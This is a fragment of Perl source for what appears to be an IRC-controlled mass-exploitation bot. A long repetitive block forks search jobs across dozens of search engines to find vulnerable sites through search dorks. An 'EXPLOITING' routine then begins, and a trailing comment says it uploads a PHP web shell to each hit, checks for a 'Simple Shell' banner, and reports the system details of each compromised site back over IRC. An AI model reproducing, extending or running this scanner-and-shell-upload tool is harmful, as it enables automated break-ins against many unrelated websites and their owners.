waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKIR",$type); } exit; } } if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKIT",$type); } exit; } } if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKJP",$type); } exit; } } if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKKR",$type); } exit; } } if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKMX",$type); } 
exit; } } if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKMY",$type); } exit; } } if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKNeT",$type); } exit; } } if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKNL",$type); } exit; } } if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKOrG",$type); } exit; } } if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKPH",$type); } exit; } } if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKPL",$type); } exit; } } if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKRO",$type); } exit; } } if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKRU",$type); } exit; } } if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKTH",$type); } exit; } } if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKUA",$type); } exit; } } if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKUK",$type); } exit; } } if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKUS",$type); } exit; } } if ($engine =~ /jacksi/i) { if (my $pid = 
fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKSI",$type); } exit; } } if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBE",$type); } exit; } } if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBIZ",$type); } exit; } } if ($engine =~ /jackby/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBY",$type); } exit; } } if ($engine =~ /jackma/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKMA",$type); } exit; } } if ($engine =~ /jackal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBA",$type); } exit; } } if ($engine =~ /jackws/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAL",$type); } exit; } } if ($engine =~ /jackch/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCH",$type); } exit; } } if ($engine =~ /jacklu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKLu",$type); } exit; } } if ($engine =~ /jackws/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKWS",$type); } exit; } } if ($engine =~ /jackdo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKDO",$type); } exit; } } if ($engine =~ /jackr1/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR1",$type); } exit; } } if ($engine =~ /jackr2/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; 
} else { &type($chan,$bug,$nick,$dork,"JacKR2",$type); } exit; } } if ($engine =~ /jackr3/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR3",$type); } exit; } } if ($engine =~ /jackr4/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR4",$type); } exit; } } if ($engine =~ /jackr5/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR5",$type); } exit; } } if ($engine =~ /jackr6/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR6",$type); } exit; } } if ($engine =~ /jackr7/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR7",$type); } exit; } } if ($engine =~ /jackr8/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR8",$type); } exit; } } if ($engine =~ /jackr9/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR9",$type); } exit; } } if ($engine =~ /jackr10/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKR10",$type); } exit; } } if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLe",$type); } exit; } } if ($engine =~ /googleCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCA",$type); } exit; } } if ($engine =~ /googleDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeDE",$type); } exit; } } if ($engine =~ /googleUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 
&type($chan,$bug,$nick,$dork,"GooGLeUK",$type); } exit; } } if ($engine =~ /googleFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeFR",$type); } exit; } } if ($engine =~ /googleES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeES",$type); } exit; } } if ($engine =~ /googleIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeIT",$type); } exit; } } if ($engine =~ /googleNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeNL",$type); } exit; } } if ($engine =~ /googleBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeBE",$type); } exit; } } if ($engine =~ /googleCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCH",$type); } exit; } } if ($engine =~ /googleSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeSE",$type); } exit; } } if ($engine =~ /googleDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeDK",$type); } exit; } } if ($engine =~ /googleNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeNO",$type); } exit; } } if ($engine =~ /googleNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeNZ",$type); } exit; } } if ($engine =~ /googleIE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeIE",$type); } exit; } } if ($engine =~ /googleBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 
&type($chan,$bug,$nick,$dork,"GooGLeBR",$type); } exit; } } if ($engine =~ /googleAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeAR",$type); } exit; } } if ($engine =~ /googleCO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCO",$type); } exit; } } if ($engine =~ /googleCU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCU",$type); } exit; } } if ($engine =~ /googleCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCL",$type); } exit; } } if ($engine =~ /googleMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeMX",$type); } exit; } } if ($engine =~ /googleAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeAU",$type); } exit; } } if ($engine =~ /googleRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeRU",$type); } exit; } } if ($engine =~ /googleAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeAT",$type); } exit; } } if ($engine =~ /googlePL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLePL",$type); } exit; } } if ($engine =~ /googleIL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeIL",$type); } exit; } } if ($engine =~ /googleTR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeTR",$type); } exit; } } if ($engine =~ /googleUA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 
&type($chan,$bug,$nick,$dork,"GooGLeUA",$type); } exit; } } if ($engine =~ /googleGR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeGR",$type); } exit; } } if ($engine =~ /googleJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeJP",$type); } exit; } } if ($engine =~ /googleCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeCN",$type); } exit; } } if ($engine =~ /googleMY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeMY",$type); } exit; } } if ($engine =~ /googleTH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeTH",$type); } exit; } } if ($engine =~ /googleIN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeIN",$type); } exit; } } if ($engine =~ /googleKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeKR",$type); } exit; } } if ($engine =~ /googleRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeRO",$type); } exit; } } if ($engine =~ /googleTW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeTW",$type); } exit; } } if ($engine =~ /googleZA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeZA",$type); } exit; } } if ($engine =~ /googlePT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLePT",$type); } exit; } } if ($engine =~ /googleBY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 
&type($chan,$bug,$nick,$dork,"GooGLeBY",$type); } exit; } } if ($engine =~ /googleSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"GooGLeSE",$type); } exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"Bing",$type); } exit; } } if ($engine =~ /bingDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingDE",$type); } exit; } } if ($engine =~ /bingUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingUK",$type); } exit; } } if ($engine =~ /bingCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingCA",$type); } exit; } } if ($engine =~ /bingBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingBR",$type); } exit; } } if ($engine =~ /bingFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingFR",$type); } exit; } } if ($engine =~ /bingES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingES",$type); } exit; } } if ($engine =~ /bingIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingIT",$type); } exit; } } if ($engine =~ /bingBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingBE",$type); } exit; } } if ($engine =~ /bingNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingNL",$type); } exit; } } if ($engine =~ /bingPT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingPT",$type); } exit; 
} } if ($engine =~ /bingNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingNO",$type); } exit; } } if ($engine =~ /bingDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingDK",$type); } exit; } } if ($engine =~ /bingSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingSE",$type); } exit; } } if ($engine =~ /bingCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingCH",$type); } exit; } } if ($engine =~ /bingNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingNZ",$type); } exit; } } if ($engine =~ /bingRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingRU",$type); } exit; } } if ($engine =~ /bingJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingJP",$type); } exit; } } if ($engine =~ /bingCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingCN",$type); } exit; } } if ($engine =~ /bingKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingKR",$type); } exit; } } if ($engine =~ /bingMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingMX",$type); } exit; } } if ($engine =~ /bingAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingAR",$type); } exit; } } if ($engine =~ /bingCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingCL",$type); } exit; } } if ($engine =~ /bingAU/i) { if (my $pid = fork) { 
waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BingAU",$type); } exit; } } if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"BigLobe",$type); } exit; } } if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"WaLLa",$type); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YaHoo",$type); } exit; } } if ($engine =~ /yahooCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoCA",$type); } exit; } } if ($engine =~ /yahooUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoUK",$type); } exit; } } if ($engine =~ /yahooDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoDE",$type); } exit; } } if ($engine =~ /yahooFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoFR",$type); } exit; } } if ($engine =~ /yahooES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoES",$type); } exit; } } if ($engine =~ /yahooIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoIT",$type); } exit; } } if ($engine =~ /yahooHK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoHK",$type); } exit; } } if ($engine =~ /yahooID/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoID",$type); } exit; } } if ($engine =~ /yahooIN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { 
exit; } else { &type($chan,$bug,$nick,$dork,"YahOoIN",$type); } exit; } } if ($engine =~ /yahooAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoAU",$type); } exit; } } if ($engine =~ /yahooMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoMX",$type); } exit; } } if ($engine =~ /yahooTW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoTW",$type); } exit; } } if ($engine =~ /yahooBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoBR",$type); } exit; } } if ($engine =~ /yahooAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoAR",$type); } exit; } } if ($engine =~ /yahooNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoNL",$type); } exit; } } if ($engine =~ /yahooDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoDK",$type); } exit; } } if ($engine =~ /yahooPH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoPH",$type); } exit; } } if ($engine =~ /yahooCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoCL",$type); } exit; } } if ($engine =~ /yahooRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoRU",$type); } exit; } } if ($engine =~ /yahooCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoCH",$type); } exit; } } if ($engine =~ /yahooCO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 
&type($chan,$bug,$nick,$dork,"YahOoCO",$type); } exit; } } if ($engine =~ /yahooFI/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoFI",$type); } exit; } } if ($engine =~ /yahooRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoRO",$type); } exit; } } if ($engine =~ /yahooVE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoVE",$type); } exit; } } if ($engine =~ /yahooAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoAT",$type); } exit; } } if ($engine =~ /yahooPL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoPL",$type); } exit; } } if ($engine =~ /yahooKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoKR",$type); } exit; } } if ($engine =~ /yahooNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoNZ",$type); } exit; } } if ($engine =~ /yahooGR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoGR",$type); } exit; } } if ($engine =~ /yahooPE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"YahOoPE",$type); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsK",$type); } exit; } } if ($engine =~ /askCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKCA",$type); } exit; } } if ($engine =~ /askDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKDE",$type); 
} exit; } } if ($engine =~ /askIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKIT",$type); } exit; } } if ($engine =~ /askFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKFR",$type); } exit; } } if ($engine =~ /askES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKES",$type); } exit; } } if ($engine =~ /askRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKRU",$type); } exit; } } if ($engine =~ /askNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKNL",$type); } exit; } } if ($engine =~ /askUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKUK",$type); } exit; } } if ($engine =~ /askBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKBR",$type); } exit; } } if ($engine =~ /askPL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKPL",$type); } exit; } } if ($engine =~ /askAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKAU",$type); } exit; } } if ($engine =~ /askAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKAT",$type); } exit; } } if ($engine =~ /askJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKJP",$type); } exit; } } if ($engine =~ /askSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKSE",$type); } exit; } } if ($engine =~ /askMX/i) { if (my $pid = fork) { waitpid($pid, 0); 
} else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKMX",$type); } exit; } } if ($engine =~ /askNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKNO",$type); } exit; } } if ($engine =~ /askDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AsKDK",$type); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"UoL",$type); } exit; } } if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"OnEt",$type); } exit; } } if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"CLusTy",$type); } exit; } } if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"SaPo",$type); } exit; } } if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"AoL",$type); } exit; } } if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"LyCos",$type); } exit; } } if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"HotBot",$type); } exit; } } if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"SeZNam",$type); } exit; } } } ###### EXPLOITING ####### sub ffm_exploit() { my $chan = $_[0]; my $bugz = $_[1]; my $nick = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$ffmlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; 
# --- Remainder of ffm_exploit's per-site loop (the sub itself opens on the previous line). ---
# For every search hit this submits the local file ./xxx.php as a form-data POST to
# "http://" . $site . $bugz and looks for the string "xxx.php" in the response body.
# On a match, a double-forked grandchild fetches the hard-coded location
# wp-content/uploads/2013/10/xxx.php and, if that page carries the banner
# "UnKnown - Simple Shell", scrapes the safe-mode flag, uname and uid from it and
# reports them together with the URL to $nick and $admin over IRC.
# Defender note: the fixed file name (xxx.php), the fixed upload path and the banner
# string are usable as web-log / file-system indicators; script files landing in an
# uploads directory should be neither accepted nor executable.
